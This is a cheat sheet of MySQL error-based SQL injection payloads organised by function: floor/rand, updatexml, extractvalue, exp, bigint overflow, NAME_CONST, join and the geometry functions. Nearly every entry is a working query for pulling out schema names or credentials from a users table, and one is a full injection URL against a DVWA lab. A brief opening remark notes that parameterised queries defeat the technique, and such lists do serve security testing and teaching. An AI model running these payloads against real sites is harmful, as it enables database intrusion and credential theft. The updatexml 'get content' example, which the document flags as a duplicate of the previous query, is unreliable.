Common MySQL functions used in error-based injection. All of them depend on the application echoing the raw MySQL error text back to the client; an application that suppresses error detail and binds query values with parameters does not expose this channel.
## 1. floor()
- Get database
mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;
- Get table name
mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
- Get field name
mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
- Get content
mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
## 2. updatexml()
- Get table name
mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);
- Get field
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
- Get content (note: the example below repeats the field-name query from the previous item)
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
## 3. exp()
and exp(~(select * from (select user() ) a) );
// exp() is the exponential function with base e (e^x); the error comes from a DOUBLE out-of-range overflow. Works on MySQL 5.5.5 and above; see the article on exp() error-based injection: http://www.cnblogs.com/lcamry/articles/5509124.html and http://netsecurity.51cto.com/art/201508/489529.htm
- Get table name
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
- Get column name
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
- Retrieve data
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
- Retrieve all schema information in one query
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)) http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
## 4. extractvalue() (output is truncated to 32 characters)
- Get table name
mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));
- Get content
mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));
## 5. NAME_CONST()
Principle of the error: http://www.2cto.com/article/201203/121491.html
Syntax
`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`
## 6. bigint overflow
`select !(select * from (select user()) x) - ~0`  (note: the `-` is a minus sign)
// BIGINT out-of-range overflow; `~0` is the bitwise negation of 0, i.e. the maximum unsigned BIGINT. Works on MySQL 5.5.5 and above; see the article on bigint overflow: http://www.cnblogs.com/lcamry/articles/5509112.html
## 7. join()
Principle: http://www.jinglingshu.org/?p=4507
Syntax
`select * from(select * from mysql.user a join mysql.user b using(Host))c;`  (easily abused)
## 8. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
## 9. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
## 10. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
## 11. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
## 12. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
## 13. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
References: https://www.cnblogs.com/wocalieshenmegui/p/5917967.html